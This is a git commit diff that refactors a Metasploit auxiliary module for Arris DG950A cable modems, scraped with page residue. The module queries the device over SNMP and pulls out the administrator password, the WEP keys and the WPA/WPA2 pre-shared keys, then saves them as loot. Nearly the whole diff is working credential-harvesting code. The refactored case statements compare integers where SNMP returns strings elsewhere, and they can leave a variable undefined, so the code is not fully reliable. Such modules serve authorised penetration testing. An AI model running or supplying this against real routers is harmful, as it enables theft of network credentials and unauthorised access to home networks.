Update arris_dg950 module with required changes
Collapsed several levels of the if/else statement and changed out 2 with case. Changed print_good to print_line. Removed rescue ::Interrupt and altered variable names to make them more readablebug/bundler_fix
parent
9a6ee5090a
commit
872ba6a53b
|
@ -30,112 +30,94 @@ class Metasploit3 < Msf::Auxiliary
|
|||
snmp = connect_snmp
|
||||
|
||||
if snmp.get_value('sysDescr.0') =~ /DG950A/
|
||||
print_good("#{ip}")
|
||||
print_line("#{ip}")
|
||||
|
||||
# System Admin Password
|
||||
wifiinfo = ''
|
||||
wifi_info = ''
|
||||
password = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0')
|
||||
print_good("Password: #{password}")
|
||||
wifiinfo << "Password: #{password}" << "\n"
|
||||
print_line("Password: #{password}")
|
||||
wifi_info << "Password: #{password}" << "\n"
|
||||
else
|
||||
fail_with("Does not appear to be an Arris DG950A")
|
||||
end
|
||||
|
||||
# check WPA Encryption Algorithm
|
||||
encryptalg = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.1.12')
|
||||
if encryptalg == '1'
|
||||
wpaencrypt = 'TKIP'
|
||||
|
||||
elsif encryptalg == '2'
|
||||
wpaencrypt = 'AES'
|
||||
|
||||
elsif encryptalg == '3'
|
||||
wpaencrypt = 'TKIP/AES'
|
||||
|
||||
encrypt_type = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.1.12')
|
||||
case encrypt_type
|
||||
when 1
|
||||
wpa_encrypt = "TKIP"
|
||||
when 2
|
||||
wpa_encrypt = "AES"
|
||||
when 3
|
||||
wpa_encrypt = "TKIP/AES"
|
||||
else
|
||||
wpaencrypt = 'Unknown'
|
||||
wpa_encrypt = "Unknown"
|
||||
end
|
||||
|
||||
# Wifi Status
|
||||
wifistatus = snmp.get_value('1.3.6.1.2.1.2.2.1.8.12')
|
||||
if wifistatus == '1'
|
||||
wifi_status = snmp.get_value('1.3.6.1.2.1.2.2.1.8.12')
|
||||
if wifi_status == '1'
|
||||
ssid = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.22.1.2.12')
|
||||
print_good("SSID: #{ssid}")
|
||||
wifiinfo << "SSID: #{ssid}" << "\n"
|
||||
print_line("SSID: #{ssid}")
|
||||
wifi_info << "SSID: #{ssid}" << "\n"
|
||||
|
||||
# Wifi Security Settings
|
||||
wifiversion = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.22.1.5.12')
|
||||
if wifiversion == '0'
|
||||
wifi_version = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.22.1.5.12')
|
||||
if wifi_version == '0'
|
||||
print_line('Open Access Wifi is Enabled')
|
||||
wifiinfo << 'Open Access WIFI is Enabled' << '\n'
|
||||
wifi_info << 'Open Access WIFI is Enabled' << '\n'
|
||||
|
||||
# Wep enabled
|
||||
elsif wifiversion == '1'
|
||||
weptype = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.23.1.2.12')
|
||||
if weptype == '1'
|
||||
print_good('WEP Key Length: 64BITS ')
|
||||
wifiinfo << 'WEP Key Length: 64BITS ' << '\n'
|
||||
wepkey1 = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.24.1.2.12.1')
|
||||
key1 = "#{wepkey1}"
|
||||
print_good("WEP KEY1: #{key1}")
|
||||
wifiinfo << "WEP KEY1: #{key1}" << "\n"
|
||||
wepkey2 = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.24.1.2.12.2')
|
||||
key2 = "#{wepkey2}"
|
||||
print_good("WEP KEY2: #{key2}")
|
||||
wifiinfo << "WEP KEY2: #{key2}" << "\n"
|
||||
wepkey3 = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.24.1.2.12.3')
|
||||
key3 = "#{wepkey3}"
|
||||
print_good("WEP KEY3: #{key3}")
|
||||
wifiinfo << "WEP KEY3: #{key3}" << "\n"
|
||||
wepkey4 = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.24.1.2.12.4')
|
||||
key4 = "#{wepkey4}"
|
||||
print_good("WEP KEY4: #{key4}")
|
||||
wifiinfo << "WEP KEY4: #{key4}" << "\n"
|
||||
|
||||
elsif weptype == '2'
|
||||
print_good('WEP Key Length: 128BITS ')
|
||||
wifiinfo << 'WEP Key Length: 128BITS ' << '\n'
|
||||
wepkey1 = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.25.1.2.12.1')
|
||||
key1 = "#{wepkey1}"
|
||||
print_good("WEP KEY1: #{key1}")
|
||||
wifiinfo << "WEP KEY1: #{key1}" << "\n"
|
||||
wepkey2 = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.25.1.2.12.2')
|
||||
key2 = "#{wepkey2}"
|
||||
print_good("WEP KEY2: #{key2}")
|
||||
wifiinfo << "WEP KEY2: #{key2}" << "\n"
|
||||
wepkey3 = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.25.1.2.12.3')
|
||||
key3 = "#{wepkey3}"
|
||||
print_good("WEP KEY3: #{key3}")
|
||||
wifiinfo << "WEP KEY3: #{key3}" << "\n"
|
||||
wepkey4 = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.25.1.2.12.4')
|
||||
key4 = "#{wepkey4}"
|
||||
print_good("WEP KEY4: #{key4}")
|
||||
wifiinfo << "WEP KEY4: #{key4}" << "\n"
|
||||
|
||||
elsif wifi_version == '1'
|
||||
wep_type = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.23.1.2.12')
|
||||
case wep_type
|
||||
when 1
|
||||
oid = "1.3.6.1.4.1.4115.1.20.1.1.3.24.1.2.12"
|
||||
when 2
|
||||
oid = "1.3.6.1.4.1.4115.1.20.1.1.3.25.1.2.12"
|
||||
else
|
||||
print_line('FAILED')
|
||||
end
|
||||
wepkey1 = snmp.get_value("#{oid}.1")
|
||||
key1 = "#{wepkey1}"
|
||||
print_line("WEP KEY1: #{key1}")
|
||||
wifi_info << "WEP KEY1: #{key1}" << "\n"
|
||||
wepkey2 = snmp.get_value("#{oid}.2")
|
||||
key2 = "#{wepkey2}"
|
||||
print_line("WEP KEY2: #{key2}")
|
||||
wifi_info << "WEP KEY2: #{key2}" << "\n"
|
||||
wepkey3 = snmp.get_value("#{oid}.3")
|
||||
key3 = "#{wepkey3}"
|
||||
print_line("WEP KEY3: #{key3}")
|
||||
wifi_info << "WEP KEY3: #{key3}" << "\n"
|
||||
wepkey4 = snmp.get_value("#{oid}.4")
|
||||
key4 = "#{wepkey4}"
|
||||
print_line("WEP KEY4: #{key4}")
|
||||
wifi_info << "WEP KEY4: #{key4}" << "\n"
|
||||
|
||||
# WPA enabled
|
||||
elsif wifiversion == '2'
|
||||
elsif wifi_version == '2'
|
||||
wpapsk = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.2.12')
|
||||
print_good("WPA PSK: #{wpapsk}")
|
||||
print_good("WPA Encryption: #{wpaencrypt}")
|
||||
wifiinfo << "WPA PSK: #{wpapsk}" << "\n"
|
||||
wifiinfo << "WPA Encryption #{wpaencrypt}" << "\n"
|
||||
print_line("WPA PSK: #{wpapsk}")
|
||||
print_line("WPA Encryption: #{wpa_encrypt}")
|
||||
wifi_info << "WPA PSK: #{wpapsk}" << "\n"
|
||||
wifi_info << "WPA Encryption #{wpa_encrypt}" << "\n"
|
||||
|
||||
# WPA2 enabled
|
||||
elsif wifiversion == '3'
|
||||
elsif wifi_version == '3'
|
||||
wpapsk2 = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.2.12')
|
||||
print_good("WPA2 PSK: #{wpapsk2}")
|
||||
print_good("WPA2 Encryption: #{wpaencrypt}")
|
||||
wifiinfo << "WPA2 PSK: #{wpapsk2}" << "\n"
|
||||
wifiinfo << "WPA2 Encryption: #{wpaencrypt}" << "\n"
|
||||
print_line("WPA2 PSK: #{wpapsk2}")
|
||||
print_line("WPA2 Encryption: #{wpa_encrypt}")
|
||||
wifi_info << "WPA2 PSK: #{wpapsk2}" << "\n"
|
||||
wifi_info << "WPA2 Encryption: #{wpa_encrypt}" << "\n"
|
||||
|
||||
# WPA/WPA2 enabled
|
||||
elsif wifiversion == '7'
|
||||
elsif wifi_version == '7'
|
||||
wpawpa2psk = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.2.12')
|
||||
print_good("WPA/WPA2 PSK: #{wpawpa2psk}")
|
||||
print_good("WPA/WPA2 Encryption: #{wpaencrypt}")
|
||||
wifiinfo << "WPA/WPA2 PSK: #{wpawpa2psk}" << "\n"
|
||||
wifiinfo << "WPA/WPA2 Encryption: #{wpaencrypt}" << "\n"
|
||||
print_line("WPA/WPA2 PSK: #{wpawpa2psk}")
|
||||
print_line("WPA/WPA2 Encryption: #{wpa_encrypt}")
|
||||
wifi_info << "WPA/WPA2 PSK: #{wpawpa2psk}" << "\n"
|
||||
wifi_info << "WPA/WPA2 Encryption: #{wpa_encrypt}" << "\n"
|
||||
|
||||
else
|
||||
print_line('FAILED')
|
||||
|
@ -143,23 +125,20 @@ class Metasploit3 < Msf::Auxiliary
|
|||
else
|
||||
print_line('WIFI is not enabled')
|
||||
end
|
||||
else
|
||||
print_line('Does not appear to be an Arris DG950A')
|
||||
exit
|
||||
end
|
||||
|
||||
# Woot we got loot.
|
||||
loot_name = 'arris_wifi'
|
||||
loot_type = 'text/plain'
|
||||
loot_filename = 'arris_wifi.text'
|
||||
loot_desc = 'Arris DG950A Wifi configuration data'
|
||||
p = store_loot(loot_name, loot_type, datastore['RHOST'], wifiinfo, loot_filename, loot_desc)
|
||||
p = store_loot(loot_name, loot_type, datastore['RHOST'], wifi_info, loot_filename, loot_desc)
|
||||
print_status("WIFI Data saved in: #{p}")
|
||||
# No need to make noise
|
||||
rescue ::SNMP::UnsupportedVersion
|
||||
rescue ::SNMP::RequestTimeout
|
||||
rescue ::Interrupt
|
||||
raise $ERROR_INFO
|
||||
rescue ::Exception => e
|
||||
print_error("#{ip} error: #{e.class} #{e}")
|
||||
print_error("#{ip} error: #{e.class} #{e.message}")
|
||||
disconnect_snmp
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue